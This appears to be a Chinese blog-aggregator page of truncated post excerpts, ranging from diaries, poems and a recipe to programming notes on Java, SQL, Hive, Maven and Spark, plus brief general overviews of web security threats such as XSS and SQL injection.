感恩今天的开启~洗头了，面膜，感恩，还有什么比这更好的呢~生命的一切都来得轻松愉快并充满荣耀~图片发自App月亮的黄人，水晶的红天行者~图片发自App今日觉察：1.上午6点起了个大早，收拾好居然都快七点了，吃早餐少一张餐券，靖又分享她说话语气和善叫了几句亲爱的对方就松口了，自己虽然没看到，不过也发现了自己当时说话语气情绪化的一面，也有点浮躁，心不够静，还是感恩~早餐吃的也棒棒哒呢~2.上午分享美容
网络安全（黑客）—2024自学笔记羊村最强沸羊羊 web安全笔记安全网络安全网络 python 开发语言
前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你
牛年第117练和乐伯阳
回归崭新的168，几无不适之感，今日没有借口，就是状态一般，发挥一般。连续两日与百扣柯王单打一小局，均是险胜，说明实力很接近了。今日双打成绩也很一般，与前场红王搭档对抗乔付组合一局被吐槽“太瘦”；吾乔/姬柯五局三胜，18-21，20-22，21-12，21-15，16-13，负局无非是因吾方状态不佳并配合不恰，又因百扣柯王与北规姬雄状态神勇。乔付组合对姬孙组合战绩辉煌，无疑是首医第一混双。
嵊州越剧小镇99㎡：诗画戏曲最为意境美丨森川软装愚叔yushu
我欲因之梦吴越，一夜飞度镜湖月。湖月照我影，送我至剡溪。——李白越剧小镇隐逸在嵊州剡溪，此处是女子越剧诞生地，散落着三个自然村落和一条明清古街。无关风月却又风月无边，极具江南灵秀之气。项目将这份越剧古韵引入室内，生动的再现了一幅江南诗意图，踏入房门仿若就成了这画里的人。景致成了调色盘，菊蕾白、合欢红、蝶翅蓝、鹿角棕糅合在一起，轻柔淡雅。雕花门窗外是连绵起伏的黛山，极目望去，颇有人闲桂花落、夜静春山
【1104Day63】复盘翻盘狸老撕
[月亮]【今日回顾】001今天干了啥退掉网购的衣服去婆婆家吃饭完成亲子手工作业心理课学习、听书002今日输入/输出了啥剽悍晨读（睡出生产力）（激素的威胁）武志红的心理课《读懂你的人生的脚本》、问答及预习听书《异类》复盘003今天为健康美腻努力了咩？今天休息睡了个傍晚小觉【经验/教训/流程总结】看了一些健身方面的文章，都是说每周运动3～4次最佳，不由地感到自己天天运动有些疲惫，身体和思想上都有点儿累
无题山中做妖怪
应该是个雨天天是黑色周围是墨绿我拾起了面又拾起了米黑白花色的狗不再喘息母鸡在雨中走走停停红漆的柜子掉了些残色窗外是忘记收起的杏核你想说这一切都很惬意我说你不懂闷雷带来的恐惧雨声掩埋了生人走过的脚步直到他将野花踩在脚下狗吠开始响起蝴蝶躲在窗沿你询问生人来的路是否蜿蜒他说不幸的是和多人照面于是米饭的香气化成烟到乌云里红漆的残色被鲜血染红至满我将野花捡起来祭奠给陌生人的葬礼
这道菜不求多，一顿只要一小把，口感香辣入味，佐粥下酒样样行！摩玛食堂
香辣花生米小鱼干所需食材：小鱼干100克花生1把姜1片大蒜2瓣葱1根花椒1撮红干椒7-8个料酒2汤匙食用油适量烹饪步骤：1.将小鱼干用流动水冲洗两遍，再放入温水中浸泡约半个小时。因为这种鱼干都特别咸，这样处理一下会好很多。2.冷锅冷油放入一把花生米，然后用小火来回翻炒至花生发出噼啪的响声时盛出晾凉。千万别等花生变色了再盛出，这样等晾凉后基本就处于糊掉的状态了。3.准备其他辅料：姜蒜切成碎末，小葱切
007点评：你有被讨厌的勇气吗？文倩定投人生
【文章日期】2022年7月28日作业雨️点评我的楼上007-252班❤️战友作者：像青春一样绽放【文章标题】《被讨厌的勇气》笔记【文章链接】此处省略。【我的感悟】亲爱的延宏：见字如面。非常高兴我们能够上下楼！因为能够收到你超级用心的点评，而开心不已^_^【见】你的文章行云流水，一气呵成。让我对这本《被讨厌的勇气》饶有兴致，有点想立马读完这本书的念头。事实上，我在搜索这本书以前，还以为是武志红老师写
个人网络防范潜※者网络安全
目录安全事件频发根源在于背后利益链条不仅仅是中国网络安全事件成国际性难题个人网络信息安全防护四招来帮忙首先，预防第一第二，健康的上网浏览习惯第三，WiFi安全性第四，规范的文件处理黑客攻击无孔不入，钓鱼网站日益频发多发，伪基站不断升级，甚至从不联网的WindowsXP都有可能感染病毒。2016年6月23日，中国五联网协会发布的《2016中国网民权益保护调查报告》显示，从2015年下半年到2016年
雪落着，伞上开着花，伞下开着花若水诗心张利红
作者：张利红图片发自App一、雪伞（1）古旧的老街隔开了城市的喧哗一把伞撑开小小的心扉雪落着伞上开着花伞下开着花（2）雪落掩盖了三千繁华伞外没有了世界伞内只有你的笑如雪（3）若即若离似无还有多想扔了这把伞就此白头二、冰挂（1）檐下冰挂屋檐下的冰挂就像人的欲望悬得越高越长就越容易摔得粉身碎骨图片发自App（2）小溪的爱情是春的一滴雨荡起你心里的涟漪你把芳心暗许你在石上叮咚婉转柔情百寄当春变成了夏艳阳
网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题程序员贵哥网络安全 xss sql 安全网络安全 web安全 php
网络安全问题一直是备受关注的话题，其中跨站脚本攻击（XSS）、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击（XSS）。XSS攻击是一种利用网站漏洞，将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本，当用户浏览该网站时，恶意脚本会被执行，从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas
桑榆不晚，唯愿夕阳红满天付强_
图片发自App昨晚，在车灯的映照下，雨丝飘飘洒洒，打着雨伞，伞面却毫无声息，是不是下雪啦？预报的有雪。天气好冷。时间已是阴历十月的最后一天，农历十月二十九。早起，去看看父亲。买了排骨，藕，鱼，青菜豆腐，还有佐料，去帮他烧顿饭。父亲说，你把菜放那儿吧，我自己弄，我想睡会儿。父亲刚出去过早回来，一般早上过早后睡个回笼觉。父亲一个人住着。在购物中心隔壁，诺大的房子就他一个人，形单影只，母亲三年前走了，客
我眼里的春天，记录百花盛开的场景玥美洋洋
图片发自App春天是绚烂多彩的春天阳光明媚，春风送暖草绿了，花开了，心情也朗润起来了图片发自App春天喜在枝头，春天美在心里各种花争芳斗艳，红的白的黄的粉的图片发自App玉兰花，迎春花，紫檀花桃花，杏花，樱花还有各种叫不出名目的花各美其美，美美与共图片发自App花是人间的使者花是幸福的象征花是美好的向往图片发自App用眼睛欣赏用手机拍摄用文字描绘让花开的每一个瞬间都成为永恒定格在这美丽的春天图片发
SQL的各种连接查询 xieke90 UNION ALL UNION 外连接内连接 JOIN
一、内连接概念：内连接就是使用比较运算符根据每个表共有的列的值匹配两个表中的行。内连接（join 或者inner join ） SQL语法： select * fron
java编程思想--复用类百合不是茶 java 继承代理组合 final类
复用类看着标题都不知道是什么,再加上java编程思想翻译的比价难懂,所以知道现在才看这本软件界的奇书一:组合语法:就是将对象的引用放到新类中即可代码: package com.wj.reuse; /** * * @author Administrator 组
[开源与生态系统]国产CPU的生态系统 comsci cpu
计算机要从娃娃抓起...而孩子最喜欢玩游戏.... 要让国产CPU在国内市场形成自己的生态系统和产业链,国家和企业就不能够忘记游戏这个非常关键的环节.... 投入一些资金和资源,人力和政策,让游
JVM内存区域划分Eden Space、Survivor Space、Tenured Gen，Perm Gen解释商人shang jvm内存
jvm区域总体分两类，heap区和非heap区。heap区又分：Eden Space（伊甸园）、Survivor Space(幸存者区)、Tenured Gen（老年代-养老区）。非heap区又分：Code Cache(代码缓存区)、Perm Gen（永久代）、Jvm Stack(java虚拟机栈)、Local Method Statck(本地方法栈)。 HotSpot虚拟机GC算法采用分代收
页面上调用 QQ oloz qq
<A href="tencent://message/?uin=707321921&Site=有事Q我&Menu=yes"> <img style="border:0px;" src=http://wpa.qq.com/pa?p=1:707321921:1></a>
一些问题文强chu 问题
1.eclipse 导出 doc 出现“The Javadoc command does not exist.” javadoc command 选择 jdk/bin/javadoc.exe 2.tomcate 配置 web 项目 ..... SQL:3.mysql * 必须得放前面否则 select&nbs
生活没有安全感小桔子生活孤独安全感
圈子好小，身边朋友没几个，交心的更是少之又少。在深圳，除了男朋友，没几个亲密的人。不知不觉男朋友成了唯一的依靠，毫不夸张的说，业余生活的全部。现在感情好，也很幸福的。但是说不准难免人心会变嘛，不发生什么大家都乐融融，发生什么很难处理。我想说如果不幸被分手(无论原因如何)，生活难免变化很大，在深圳，我没交心的朋友。明
php 基础语法 aichenglong php 基本语法
1 .1 php变量必须以$开头 <?php $a=” b”; echo ?> 1 .2 php基本数据库类型 Integer float/double Boolean string 1 .3 复合数据类型数组array和对象 object 1 .4 特殊数据类型 null 资源类型(resource) $co
mybatis tools 配置详解 AILIKES mybatis
MyBatis Generator中文文档 MyBatis Generator中文文档地址： http://generator.sturgeon.mopaas.com/ 该中文文档由于尽可能和原文内容一致，所以有些地方如果不熟悉，看中文版的文档的也会有一定的障碍，所以本章根据该中文文档以及实际应用，使用通俗的语言来讲解详细的配置。本文使用Markdown进行编辑，但是博客显示效
继承与多态的探讨百合不是茶 JAVA面向对象继承对象
继承 extends 多态继承是面向对象最经常使用的特征之一：继承语法是通过继承发、基类的域和方法 //继承就是从现有的类中生成一个新的类，这个新类拥有现有类的所有extends是使用继承的关键字：在A类中定义属性和方法； class A{ //定义属性 int age； //定义方法 public void go
JS的undefined与null的实例 bijian1013 JavaScript JavaScript
<form name="theform" id="theform"> </form> <script language="javascript"> var a alert(typeof(b)); //这里提示undefined if(theform.datas
TDD实践（一） bijian1013 java 敏捷 TDD
一.TDD概述 TDD：测试驱动开发，它的基本思想就是在开发功能代码之前，先编写测试代码。也就是说在明确要开发某个功能后，首先思考如何对这个功能进行测试，并完成测试代码的编写，然后编写相关的代码满足这些测试用例。然后循环进行添加其他功能，直到完全部功能的开发。
[Maven学习笔记十]Maven Profile与资源文件过滤器 bit1129 maven
什么是Maven Profile Maven Profile的含义是针对编译打包环境和编译打包目的配置定制，可以在不同的环境上选择相应的配置，例如DB信息，可以根据是为开发环境编译打包，还是为生产环境编译打包，动态的选择正确的DB配置信息 Profile的激活机制 1.Profile可以手工激活，比如在Intellij Idea的Maven Project视图中可以选择一个P
【Hive八】Hive用户自定义生成表函数(UDTF) bit1129 hive
1. 什么是UDTF UDTF，是User Defined Table-Generating Functions，一眼看上去，貌似是用户自定义生成表函数，这个生成表不应该理解为生成了一个HQL Table，貌似更应该理解为生成了类似关系表的二维行数据集 2. 如何实现UDTF 继承org.apache.hadoop.hive.ql.udf.generic
tfs restful api 加auth 2.0认计 ronin47
　　目前思考如何给tfs的ngx-tfs api增加安全性。有如下两点：　　一是基于客户端的ip设置。这个比较容易实现。　　二是基于OAuth2.0认证，这个需要lua，实现起来相对于一来说，有些难度。　　现在重点介绍第二种方法实现思路。　　前言：我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算，阅读下面的文档，实现自动化并获得收益。SeatGe
jdk环境变量配置 byalias java jdk
进行java开发，首先要安装jdk，安装了jdk后还要进行环境变量配置： 1、下载jdk（http://java.sun.com/javase/downloads/index.jsp），我下载的版本是：jdk-7u79-windows-x64.exe 2、安装jdk-7u79-windows-x64.exe 3、配置环境变量：右击"计算机"-->&quo
《代码大全》表驱动法-Table Driven Approach-2 bylijinnan java
package com.ljn.base; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.InputStreamReader; import java.util.ArrayList; import java.util.Collections; import java.uti
SQL 数值四舍五入小数点后保留2位 chicony 四舍五入
1.round() 函数是四舍五入用，第一个参数是我们要被操作的数据，第二个参数是设置我们四舍五入之后小数点后显示几位。 2.numeric 函数的2个参数，第一个表示数据长度，第二个参数表示小数点后位数。例如：　　select cast(round(12.5,2) as numeric(5,2))
c++运算符重载 CrazyMizzz C++
一、加+，减-，乘*，除/ 的运算符重载 Rational operator*(const Rational &x) const{ return Rational(x.a * this->a); } 在这里只写乘法的，加减除的写法类似二、<<输出,>>输入的运算符重载 &nb
hive DDL语法汇总 daizj hive 修改列 DDL 修改表
hive DDL语法汇总１、对表重命名 hive> ALTER TABLE table_name RENAME TO new_table_name; 2、修改表备注 hive> ALTER TABLE table_name SET TBLPROPERTIES ('comment' = new_comm
jbox使用说明 dcj3sjt126com Web
参考网址：http://www.kudystudio.com/jbox/jbox-demo.html jBox v2.3 beta [ 点击下载] 技术交流QQGroup：172543951 100521167 [2011-11-11] jBox v2.3 正式版 - [调整&修复] IE6下有iframe或页面有active、applet控件
UISegmentedControl 开发笔记 dcj3sjt126com
// typedef NS_ENUM(NSInteger, UISegmentedControlStyle) { // UISegmentedControlStylePlain, // large plain &
Slick生成表映射文件 ekian scala
Scala添加SLICK进行数据库操作，需在sbt文件上添加slick-codegen包 "com.typesafe.slick" %% "slick-codegen" % slickVersion 因为我是连接SQL Server数据库，还需添加slick-extensions，jtds包 "com.typesa
ES-TEST gengzg test
package com.MarkNum; import java.io.IOException; import java.util.Date; import java.util.HashMap; import java.util.Map; import javax.servlet.ServletException; import javax.servlet.annotation
为何外键不再推荐使用 hugh.wang mysql DB
表的关联，是一种逻辑关系，并不需要进行物理上的“硬关联”，而且你所期望的关联，其实只是其数据上存在一定的联系而已，而这种联系实际上是在设计之初就定义好的固有逻辑。在业务代码中实现的时候，只要按照设计之初的这种固有关联逻辑来处理数据即可，并不需要在数据库层面进行“硬关联”，因为在数据库层面通过使用外键的方式进行“硬关联”，会带来很多额外的资源消耗来进行一致性和完整性校验，即使很多时候我们并不
领域驱动设计 julyflame VO DAO 设计模式 DTO po
概念： VO（View Object）：视图对象，用于展示层，它的作用是把某个指定页面（或组件）的所有数据封装起来。 DTO（Data Transfer Object）：数据传输对象，这个概念来源于J2EE的设计模式，原来的目的是为了EJB的分布式应用提供粗粒度的数据实体，以减少分布式调用的次数，从而提高分布式调用的性能和降低网络负载，但在这里，我泛指用于展示层与服务层之间的数据传输对
单例设计模式 hm4123660 java Singleton 单例设计模式懒汉式饿汉式
单例模式是一种常用的软件设计模式。在它的核心结构中只包含一个被称为单例类的特殊类。通过单例模式可以保证系统中一个类只有一个实例而且该实例易于外界访问，从而方便对实例个数的控制并节约系统源。如果希望在系统中某个类的对象只能存在一个，单例模式是最好的解决方案。 &nb
logback zhb8015 log logback
一、logback的介绍 Logback是由log4j创始人设计的又一个开源日志组件。logback当前分成三个模块：logback-core,logback- classic和logback-access。logback-core是其它两个模块的基础模块。logback-classic是log4j的一个改良版本。此外logback-class
整合Kafka到Spark Streaming——代码示例和挑战 Stark_Summer spark storm zookeeper PARALLELISM processing
作者Michael G. Noll是瑞士的一位工程师和研究员，效力于Verisign，是Verisign实验室的大规模数据分析基础设施（基础Hadoop）的技术主管。本文，Michael详细的演示了如何将Kafka整合到Spark Streaming中。期间， Michael还提到了将Kafka整合到 Spark Streaming中的一些现状，非常值得阅读，虽然有一些信息在Spark 1.2版
spring-master-slave-commondao 王新春 DAO spring dataSource slave master
互联网的web项目，都有个特点：请求的并发量高，其中请求最耗时的db操作，又是系统优化的重中之重。为此，往往搭建 db的一主多从库的数据库架构。作为web的DAO层，要保证针对主库进行写操作，对多个从库进行读操作。当然在一些请求中，为了避免主从复制的延迟导致的数据不一致性，部分的读操作也要到主库上。（这种需求一般通过业务垂直分开，比如下单业务的代码所部署的机器，读去应该也要从主库读取数